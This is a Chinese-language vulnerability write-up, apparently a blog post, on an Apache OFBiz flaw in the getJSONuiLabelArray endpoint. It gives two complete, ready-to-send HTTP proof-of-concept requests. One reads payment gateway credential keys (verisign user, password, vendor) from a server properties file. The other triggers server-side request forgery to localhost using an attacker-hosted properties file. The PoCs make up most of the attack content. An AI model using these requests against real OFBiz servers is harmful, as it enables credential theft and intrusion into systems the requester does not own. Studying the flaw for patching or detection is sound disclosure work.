Apache OFBiz 是一个开源的企业资源计划系统。
在 getJSONuiLabelArray 接口的处理方法 CommonEvents.java#getJSONuiLabelArray 中,由于 UtilProperties.getMessage(resource, resourceKey, locale) 允许从攻击者可控的 labelObject 中接收 resource 和 resourceKey,攻击者可以传入 URL或文件路径,从而进行服务器端请求伪造(SSRF)攻击和任意文件读取。
任意文件读取 poc
以读取 applications/accounting/config/payment.properties 中的几个 key 为例
POST /webtools/control/getJSONuiLabelArray/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host:
Content-type: application/x-www-form-urlencoded
Content-Length: 148
requiredLabels={"file:applications/accounting/config/payment.properties":["payment.verisign.user","payment.verisign.pwd","payment.verisign.vendor"]}
SSRF
POST /webtools/control/getJSONuiLabelArray/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host:
Content-type: application/x-www-form-urlencoded
Content-Length: 148
requiredLabels={"http://127.0.0.1/":["xxxxxx"]}
这里随便写一个 properties 文件,然后 python -m http.server 8000 起个服务
扫一扫
403
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
